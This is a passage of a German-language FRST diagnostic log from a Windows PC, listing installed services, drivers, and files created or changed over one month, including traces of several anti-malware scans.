S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7456464 2021-02-04] (Malwarebytes Inc -> Malwarebytes)
S4 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2533952 2021-01-21] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3479624 2021-01-21] (Electronic Arts, Inc. -> Electronic Arts)
R2 PDF24; E:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-08-13] (Geek Software GmbH -> Geek Software GmbH)
S2 PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [76152 2020-12-23] (Even Balance, Inc. -> )
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 tmGAInstall; C:\Program Files (x86)\Thrustmaster\Thrustmaster FFB Driver\drivers\amd64\tmGAInstall.EXE [48128 2018-09-17] (Guillemot Recherche et Développement, Inc -> Thrustmaster®)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [147392 2019-04-30] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-05] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-05] (Microsoft Windows Publisher -> Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R3 AMDXE; C:\WINDOWS\System32\drivers\amdxe.sys [62056 2020-07-27] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
S3 BRDriver64_1_3_3_E02B25FC; C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [78088 2019-02-17] (BitRaider -> BitRaider)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Datei ist nicht signiert]
S3 cjusb; C:\WINDOWS\System32\drivers\cjusb.sys [43224 2017-03-28] (REINER Kartengeraete GmbH & Co. KG -> REINER SCT)
S4 epp; kein ImagePath
R3 gdrv; C:\Windows\gdrv.sys [26192 2021-02-04] (Giga-Byte Technology -> Windows (R) Server 2003 DDK provider)
R1 HWiNFO32; C:\Windows\system32\drivers\HWiNFO64A.SYS [27552 2019-01-08] (Martin Malik - REALiX -> REALiX(tm))
S3 kltap; C:\WINDOWS\System32\drivers\kltap.sys [52152 2016-06-07] (AnchorFree Inc -> The OpenVPN Project)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [19912 2021-02-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248992 2021-02-04] (Malwarebytes Inc -> Malwarebytes)
R3 MpKsl0d15b95e; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{805D9D8E-D276-4267-82FF-8CC6034A0B33}\MpKslDrv.sys [47344 2021-02-04] (Microsoft Windows -> Microsoft Corporation)
R1 npcap; C:\WINDOWS\system32\DRIVERS\npcap.sys [74616 2020-09-25] (Insecure.Com LLC -> Insecure.Com LLC.)
S3 nusb3hub; C:\WINDOWS\system32\drivers\nusb3hub.sys [80384 2010-09-30] (Microsoft Windows Hardware Compatibility Publisher -> Renesas Electronics Corporation)
S3 nusb3xhc; C:\WINDOWS\system32\drivers\nusb3xhc.sys [180736 2010-09-30] (Microsoft Windows Hardware Compatibility Publisher -> Renesas Electronics Corporation)
R2 speedfan; C:\WINDOWS\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-05] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-05] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-05] (Microsoft Windows -> Microsoft Corporation)
U3 idsvc; kein ImagePath
U4 npcap_wifi; kein ImagePath
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2021-02-04 13:29 - 2021-02-04 13:29 - 000000000 ___HD C:\Users\Public\Documents\AdobeGC
2021-02-04 12:39 - 2021-02-04 12:39 - 000000944 _____ C:\Users\Preso\Desktop\scan_210204-114548.txt
2021-02-04 11:53 - 2021-02-04 13:35 - 000000000 ____D C:\FRST
2021-02-04 11:25 - 2021-02-04 11:25 - 000000924 _____ C:\Users\Preso\Desktop\scan_210204-102513.txt
2021-02-04 10:22 - 2021-02-04 10:22 - 000000000 ____D C:\ProgramData\Emsisoft
2021-02-04 10:18 - 2021-02-04 13:28 - 000000000 ____D C:\EEK
2021-02-04 10:03 - 2021-02-04 10:03 - 000001880 _____ C:\Users\Preso\Desktop\AdwCleaner[C00].txt
2021-02-04 09:57 - 2021-02-04 10:02 - 000000000 ____D C:\AdwCleaner
2021-02-04 09:52 - 2021-02-04 09:52 - 000002944 _____ C:\Users\elsewhere\Desktop\MBAM.txt
2021-02-04 09:50 - 2021-02-04 13:31 - 000000000 ____D C:\Users\elsewhere\AppData\Local\CrashDumps
2021-02-04 09:49 - 2021-02-04 09:49 - 000000022 _____ C:\WINDOWS\S.dirmngr
2021-02-04 09:41 - 2021-02-04 09:49 - 000000000 ____D C:\Users\elsewhere\AppData\LocalLow\IGDump
2021-02-04 09:34 - 2021-02-04 09:34 - 000002033 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2021-02-04 09:34 - 2021-02-04 09:34 - 000002021 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2021-02-04 09:34 - 2021-02-04 09:34 - 000002021 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2021-02-04 09:34 - 2021-02-04 09:34 - 000000000 ____D C:\Users\elsewhere\AppData\Local\mbam
2021-02-04 09:33 - 2021-02-04 09:33 - 000248992 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2021-02-04 09:33 - 2021-02-04 09:33 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2021-02-04 09:33 - 2021-02-04 09:33 - 000019912 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2021-02-04 09:33 - 2021-02-04 09:33 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-02-04 09:29 - 2021-02-04 09:29 - 000000000 ____D C:\Program Files\Malwarebytes
2021-02-03 19:21 - 2021-02-03 19:21 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2021-02-03 19:21 - 2021-02-03 19:21 - 000164160 _____ C:\WINDOWS\system32\cmdiag.exe
2021-02-03 19:20 - 2021-02-03 19:20 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2021-02-03 19:20 - 2021-02-03 19:20 - 001314112 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2021-02-03 19:20 - 2021-02-03 19:20 - 000010908 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-02-03 19:19 - 2021-02-03 19:19 - 000231232 _____ C:\WINDOWS\system32\containerdevicemanagement.dll
2021-02-03 17:36 - 2021-02-03 17:38 - 036893384 _____ (Samsung Electronics Co., Ltd.) C:\Users\Preso\Downloads\SAMSUNG_USB_Driver_for_Mobile_Phones.exe
2021-02-03 17:29 - 2021-02-03 19:58 - 000000000 ___SD C:\WINDOWS\system32\containers
2021-02-03 17:29 - 2021-02-03 17:29 - 000001162 _____ C:\WINDOWS\system32\config\VSMIDK
2021-02-03 17:29 - 2021-02-03 17:29 - 000000000 ____D C:\WINDOWS\system32\HvsiSettingsProviders
2021-01-22 13:10 - 2021-01-22 13:10 - 000000000 ____D C:\Users\elsewhere\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bing Wallpaper
2021-01-20 15:15 - 2021-01-20 15:15 - 000000112 ___SH C:\bootTel.dat
2021-01-19 09:12 - 2021-01-19 09:12 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-19 09:12 - 2021-01-19 09:12 - 000000000 ____D C:\Users\Preso\AppData\LocalLow\Mozilla
2021-01-19 09:11 - 2021-01-19 09:12 - 000000000 ____D C:\Users\Preso\AppData\Roaming\Mozilla
2021-01-19 09:11 - 2021-01-19 09:11 - 000000000 ____D C:\Users\Preso\AppData\Local\Mozilla
2021-01-13 02:11 - 2021-01-13 02:11 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 02:11 - 2021-01-13 02:11 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 02:11 - 2021-01-13 02:11 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 02:11 - 2021-01-13 02:11 - 000166728 _____ C:\WINDOWS\system32\HvsiSettingsWorker.exe
2021-01-13 02:11 - 2021-01-13 02:11 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 02:11 - 2021-01-13 02:11 - 000152888 _____ C:\WINDOWS\system32\IsolatedWindowsEnvironmentUtils.dll
2021-01-13 02:11 - 2021-01-13 02:11 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 02:11 - 2021-01-13 02:11 - 000111944 _____ C:\WINDOWS\SysWOW64\IsolatedWindowsEnvironmentUtils.dll
2021-01-13 02:11 - 2021-01-13 02:11 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 02:11 - 2021-01-13 02:11 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 02:11 - 2021-01-13 02:11 - 000087552 _____ C:\WINDOWS\system32\hvsiDspdvcclient.dll
2021-01-13 02:11 - 2021-01-13 02:11 - 000079672 _____ C:\WINDOWS\system32\hvsifiletrust.dll
2021-01-13 02:11 - 2021-01-13 02:11 - 000061264 _____ C:\WINDOWS\SysWOW64\hvsifiletrust.dll
2021-01-13 02:10 - 2021-01-13 02:10 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 02:10 - 2021-01-13 02:10 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 02:10 - 2021-01-13 02:10 - 000374072 _____ C:\WINDOWS\system32\vp9fs.dll
2021-01-13 02:10 - 2021-01-13 02:10 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 02:10 - 2021-01-13 02:10 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 02:10 - 2021-01-13 02:10 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 02:10 - 2021-01-13 02:10 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 02:10 - 2021-01-13 02:10 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 02:10 - 2021-01-13 02:10 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 02:10 - 2021-01-13 02:10 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 02:10 - 2021-01-13 02:10 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 02:10 - 2021-01-13 02:10 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 02:09 - 2021-01-13 02:09 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 02:09 - 2021-01-13 02:09 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 02:09 - 2021-01-13 02:09 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 02:09 - 2021-01-13 02:09 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 02:09 - 2021-01-13 02:09 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 02:09 - 2021-01-13 02:09 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 02:09 - 2021-01-13 02:09 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 02:09 - 2021-01-13 02:09 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 02:08 - 2021-01-13 02:08 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 02:08 - 2021-01-13 02:08 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 02:08 - 2021-01-13 02:08 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 02:08 - 2021-01-13 02:08 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 02:08 - 2021-01-13 02:08 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 02:08 - 2021-01-13 02:08 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 02:08 - 2021-01-13 02:08 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 02:08 - 2021-01-13 02:08 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 02:08 - 2021-01-13 02:08 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 02:07 - 2021-01-13 02:07 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 02:07 - 2021-01-13 02:07 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 02:07 - 2021-01-13 02:07 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 02:07 - 2021-01-13 02:07 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 02:07 - 2021-01-13 02:07 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 02:07 - 2021-01-13 02:07 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 02:07 - 2021-01-13 02:07 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 02:06 - 2021-01-13 02:06 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 01:48 - 2021-01-13 01:48 - 000000000 ____D C:\Users\Default\.dotnet
2021-01-13 01:48 - 2021-01-13 01:48 - 000000000 ____D C:\Users\Default User\.dotnet
2021-01-11 11:39 - 2021-01-11 11:40 - 000000015 _____ C:\Users\elsewhere\Documents\gespr telefonica.txt
2021-01-09 10:44 - 2021-01-11 07:10 - 000000000 ____D C:\Users\elsewhere\AppData\Roaming\Wireshark
2021-01-09 10:42 - 2021-01-09 10:42 - 000003166 _____ C:\WINDOWS\system32\Tasks\npcapwatchdog
2021-01-09 10:42 - 2021-01-09 10:42 - 000001827 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wireshark.lnk
2021-01-09 10:42 - 2021-01-09 10:42 - 000000000 ____D C:\WINDOWS\SysWOW64\Npcap
2021-01-09 10:42 - 2021-01-09 10:42 - 000000000 ____D C:\WINDOWS\system32\Npcap
2021-01-09 10:41 - 2021-01-09 10:42 - 000000000 ____D C:\Program Files\Npcap
2021-01-09 10:39 - 2021-01-09 10:42 - 000000000 ____D C:\Program Files\Wireshark
2021-01-08 22:14 - 2021-01-08 22:15 - 000000010 _____ C:\Users\elsewhere\Documents\fritz.txt
2021-01-08 21:55 - 2021-01-08 21:55 - 000000000 ____D C:\Users\elsewhere\.idlerc
2021-01-08 21:38 - 2021-01-08 21:38 - 000000000 ____D C:\Python27
2021-01-08 21:38 - 2021-01-08 21:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7
2021-01-08 20:34 - 2021-01-08 20:34 - 000000009 _____ C:\Users\elsewhere\Documents\ip-phone-forum.txt
2021-01-07 13:27 - 2021-02-04 06:42 - 137363456 _____ C:\WINDOWS\system32\config\SOFTWARE
2021-01-07 13:24 - 2021-01-07 13:27 - 000000000 ____D C:\WINDOWS\Microsoft Antimalware
==================== Ein Monat (geänderte) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2021-02-04 13:32 - 2019-01-04 11:04 - 000000000 ____D C:\Program Files (x86)\Origin Games
2021-02-04 13:32 - 2019-01-04 10:53 - 000000000 ____D C:\Users\elsewhere\AppData\Roaming\Origin
2021-02-04 13:32 - 2019-01-04 10:53 - 000000000 ____D C:\ProgramData\Origin
2021-02-04 13:31 - 2019-01-04 10:53 - 000000000 ____D C:\Users\elsewhere\AppData\Local\Origin
2021-02-04 13:31 - 2018-01-25 17:45 - 000000000 ___RD C:\Users\elsewhere\OneDrive
2021-02-04 13:29 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-02-04 13:28 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-02-04 13:28 - 2019-03-27 21:04 - 000026192 ____N (Windows (R) Server 2003 DDK provider) C:\WINDOWS\gdrv.sys
2021-02-04 13:13 - 2020-11-27 05:48 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-02-04 12:12 - 2016-01-27 13:59 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2021-02-04 11:19 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-02-04 10:20 - 2020-05-25 16:16 - 000000000 ____D C:\Users\Preso\AppData\Local\D3DSCache
2021-02-04 09:56 - 2020-11-27 05:56 - 001985500 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-02-04 09:56 - 2019-12-07 15:51 - 000828274 _____ C:\WINDOWS\system32\perfh007.dat
2021-02-04 09:56 - 2019-12-07 15:51 - 000179400 _____ C:\WINDOWS\system32\perfc007.dat
2021-02-04 09:49 - 2020-11-27 05:58 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-02-04 09:49 - 2020-11-27 05:48 - 000008192 ___SH C:\DumpStack.log.tmp
2021-02-04 09:33 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-02-04 08:47 - 2020-11-25 23:06 - 000002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-02-04 08:47 - 2020-11-25 23:06 - 000002198 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-02-04 08:47 - 2020-11-25 23:06 - 000002198 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2021-02-04 06:42 - 2019-12-14 17:17 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin
2021-02-04 06:42 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2021-02-04 02:23 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-02-03 20:36 - 2020-05-26 17:34 - 000000000 ____D C:\Users\elsewhere\AppData\Local\D3DSCache
2021-02-03 19:59 - 2020-11-27 05:48 - 000562672 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-02-03 19:58 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-02-03 19:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Keywords
2021-02-03 19:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-02-03 19:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-02-03 19:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Keywords
2021-02-03 19:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2021-02-03 19:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-02-03 19:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-02-03 19:58 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\servicing
2021-02-03 19:30 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-02-03 19:03 - 2019-11-28 18:33 - 000000000 ____D C:\Program Files\MetaTrader 5
2021-02-03 17:28 - 2020-12-05 17:31 - 000672584 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmcompute.dll
2021-02-03 17:28 - 2020-12-05 17:31 - 000596992 _____ (Microsoft Corporation) C:\WINDOWS\system32\gns.dll
2021-02-03 17:28 - 2020-12-05 17:31 - 000103936 _____ C:\WINDOWS\system32\cmimageworker.exe
2021-02-03 17:28 - 2020-12-05 17:29 - 000255816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbusr.sys
2021-02-03 17:28 - 2020-12-05 17:29 - 000025928 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmbuspiper.dll
2021-02-03 17:28 - 2020-11-27 05:39 - 001499136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vfpext.sys
2021-02-03 17:28 - 2020-11-27 05:39 - 000405824 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmprox.dll
2021-02-03 17:28 - 2020-11-27 05:39 - 000392192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmvpci.dll
2021-02-03 17:28 - 2020-11-27 05:39 - 000320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\vfpctrl.exe
2021-02-03 17:28 - 2020-11-27 05:39 - 000175944 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmickrnl.dll
2021-02-03 17:28 - 2020-11-27 05:39 - 000158208 _____ (Microsoft Corporation) C:\WINDOWS\system32\hnsdiag.exe
2021-02-03 17:28 - 2020-11-27 05:39 - 000109384 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmwpevents.dll
2021-02-03 17:28 - 2020-11-27 05:39 - 000079168 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmwpctrl.dll
2021-02-03 17:28 - 2020-11-27 05:39 - 000038912 _____ (Microsoft Corporation) C:\WINDOWS\system32\vfpapi.dll
2021-02-03 17:28 - 2020-11-27 05:39 - 000026944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hvsicontainerservice.dll
2021-02-03 17:28 - 2020-11-27 05:38 - 000206152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vpcivsp.sys
2021-02-03 17:28 - 2020-11-27 05:38 - 000175416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storvsp.sys
2021-02-03 17:28 - 2019-12-07 10:10 - 000237584 _____ (Microsoft Corporation) C:\WINDOWS\system32\CExecSvc.exe
2021-02-03 17:28 - 2019-12-07 10:10 - 000085512 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcsetupagent.exe
2021-02-03 17:28 - 2019-12-07 10:10 - 000056848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvsifltr.sys
2021-02-03 17:28 - 2019-12-07 10:10 - 000028984 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtilityVmSysprep.dll
2021-02-03 17:28 - 2019-12-07 10:10 - 000015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\VmComputeProxy.dll
2021-02-03 17:28 - 2019-12-07 10:10 - 000012088 _____ (Microsoft Corporation) C:\WINDOWS\system32\c28c7a4e-a619-4463-82b7-0fc9cc7187f5_HyperV-ComputeStorage.dll
2021-02-03 17:28 - 2019-12-07 10:09 - 000260616 _____ (Microsoft Corporation) C:\WINDOWS\system32\hcsdiag.exe
2021-02-03 17:28 - 2019-12-07 10:09 - 000222008 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetMgmtIF.dll
2021-02-03 17:28 - 2019-12-07 10:09 - 000151352 _____ C:\WINDOWS\system32\nmscrub.exe
2021-02-03 17:28 - 2019-12-07 10:09 - 000142648 _____ (Microsoft Corporation) C:\WINDOWS\system32\nmbind.exe
2021-02-03 17:28 - 2019-12-07 10:09 - 000129336 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmvirtio.dll
2021-02-03 17:28 - 2019-12-07 10:09 - 000123704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmclr.sys
2021-02-03 17:28 - 2019-12-07 10:09 - 000061240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pvhdparser.sys
2021-02-03 17:28 - 2019-12-07 10:09 - 000058888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\l2bridge.sys
2021-02-03 17:28 - 2019-12-07 10:09 - 000049192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdparser.sys
2021-02-03 17:28 - 2019-12-07 10:09 - 000041784 _____ (Microsoft Corporation) C:\WINDOWS\system32\NvAgent.dll
2021-02-03 17:28 - 2019-12-07 10:09 - 000039440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\passthruparser.sys
2021-02-03 17:28 - 2019-12-07 10:09 - 000037112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbresources.dll
2021-02-03 17:28 - 2019-12-07 10:09 - 000036152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvsocketcontrol.sys
2021-02-03 17:28 - 2019-12-07 10:09 - 000031544 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmcomputeeventlog.dll
2021-02-03 17:28 - 2019-12-07 10:09 - 000027448 _____ (Microsoft Corporation) C:\WINDOWS\system32\VrdUmed.dll
2021-02-03 17:28 - 2019-12-07 10:09 - 000021304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hnswfpdriver.sys
2021-02-03 17:28 - 2019-12-07 10:09 - 000012816 _____ (Microsoft Corporation) C:\WINDOWS\system32\f989b52d-f928-44a3-9bf1-bf0c1da6a0d6_HyperV-DeviceVirtualization.dll
2021-02-03 17:28 - 2019-12-07 10:09 - 000012600 _____ (Microsoft Corporation) C:\WINDOWS\system32\d4d78066-e6db-44b7-b5cd-2eb82dce620c_HyperV-ComputeLegacy.dll
2021-02-03 17:28 - 2019-12-07 10:09 - 000012600 _____ (Microsoft Corporation) C:\WINDOWS\system32\c4d66f00-b6f0-4439-ac9b-c5ea13fe54d7_HyperV-ComputeCore.dll
2021-02-03 17:28 - 2019-12-07 10:09 - 000012304 _____ (Microsoft Corporation) C:\WINDOWS\system32\07409496-a423-4a3e-b620-2cfb01a9318d_HyperV-ComputeNetwork.dll
2021-02-03 17:28 - 2019-12-07 10:07 - 000044344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vkrnlintvsp.sys
2021-02-03 17:28 - 2019-12-07 10:07 - 000041488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vkrnlintvsc.sys
2021-02-03 17:24 - 2020-12-20 20:00 - 000000000 ____D C:\Users\Preso\AppData\Local\AMD_Common
2021-02-03 17:19 - 2020-11-27 05:58 - 000003356 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1399086370-1300056321-2305582902-1000
2021-02-03 17:19 - 2020-11-27 05:49 - 000002416 _____ C:\Users\Preso\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-02-03 17:19 - 2020-06-03 10:23 - 000000000 ___RD C:\Users\Preso\OneDrive
2021-02-03 11:54 - 2020-11-27 05:49 - 000000000 ____D C:\Users\elsewhere
2021-02-02 06:25 - 2020-05-25 14:20 - 000000000 ____D C:\Users\elsewhere\AppData\Local\Packages
2021-02-01 19:30 - 2020-08-16 09:39 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-02-01 19:30 - 2020-08-16 09:39 - 000002274 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2021-02-01 19:30 - 2020-08-16 09:39 - 000002274 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2021-02-01 19:12 - 2020-05-25 16:20 - 000000000 ____D C:\Users\elsewhere\AppData\Local\PlaceholderTileLogoFolder
2021-02-01 19:04 - 2020-11-27 05:49 - 000002428 _____ C:\Users\elsewhere\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-02-01 18:55 - 2019-01-04 11:03 - 000000000 ____D C:\Program Files (x86)\Origin
2021-02-01 18:44 - 2020-06-03 10:21 - 000000000 ____D C:\Users\Preso\AppData\Local\Packages
2021-02-01 18:36 - 2020-12-07 16:20 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
